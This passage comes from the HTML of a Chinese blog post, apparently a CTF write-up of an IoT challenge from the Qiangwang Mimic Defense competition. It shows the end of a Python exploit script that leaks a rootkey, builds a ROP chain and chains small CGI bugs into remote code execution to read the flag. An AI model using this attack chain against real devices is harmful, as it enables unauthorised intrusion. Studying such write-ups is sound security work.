print(hex(len(file_path)))</span><br><br>    payload = &#123;<br>        <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;download&quot;</span>,<br>        <span class="hljs-string">&quot;path&quot;</span>: file_path,<br>    &#125;<br>    rootkey = upload(payload)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] rootkey: &quot;</span> + rootkey)<br><br>    payload = &#123;<br>        <span class="hljs-string">&quot;setid&quot;</span>: <span class="hljs-string">&quot;-1&quot;</span>,<br>    &#125;<br>    set_id(payload)<br><br>    make_rop()<br><br>    payload = &#123;<br>        <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;manage&quot;</span>,<br>        <span class="hljs-string">&quot;rk&quot;</span>: rootkey,<br>    &#125;<br>    manage(payload)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_flag</span>():<br>    payload = &#123;<br>        <span class="hljs-string">&quot;action&quot;</span>: <span class="hljs-string">&quot;logs&quot;</span>,<br>    &#125;<br>    flag = manage(payload)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[+] &quot;</span>, flag)<br><br>login()<br>redirect_flag_to_log()<br>get_flag()<br><br></code></pre></td></tr></table></figure>


<p>这个脚本需要分开执行，先执行下面，同时保证rootkey是可见字符（如果不是，则会让最后的漏洞无法触发）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">login()<br>redirect_flag_to_log()<br></code></pre></td></tr></table></figure>


<p>接着执行，就可以拿到flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">login()<br>get_flag()<br></code></pre></td></tr></table></figure>


<p><img src="https://cdn.jsdelivr.net/gh/f1lyyy/blog_photo@main/mimic_2025_winmt/image_walZTf1vww.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>总体来看其实难度并不算大，但逆向上会耽误一点时间，主要是对于总体的把控，比如说每一个cgi有什么功能，我怎么去触发，哪些功能有问题，并巧妙地将孤立的微小漏洞组合起来，形成一条完整的 RCE 攻击链</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Writeup/" class="category-chain-item">Writeup</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/iot/" class="print-no-link">#iot</a>
      
        <a href="/tags/%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/" class="print-no-link">#强网拟态</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>第八届“强网”拟态防御国际精英挑战赛 - WIN！致敬mt 复现</div>
      <div>https://flyyy.top/2025/10/30/mimic_2025_winmt/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>flyyy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>October 30, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/11/10/AFL%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/" title="AFL源码分析">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">AFL源码分析</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/13/CVE-2025-6554/" title="CVE-2025-6554">
                        <span class="hidden-mobile">CVE-2025-6554</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      苏ICP备2024115526号
    </a>
  </span>
  
    
      <span>
        <a
          href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=32080302000199"
          rel="nofollow noopener"
          class="beian-police"
          target="_blank"
        >
          
            <span style="visibility: hidden; width: 0">|</span>
            <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
          
          <span>苏公网安备32080302000199号</span>
        </a>
      </span>
    
  
</div>

  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>

  <script defer src="https://vercount.one/js/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
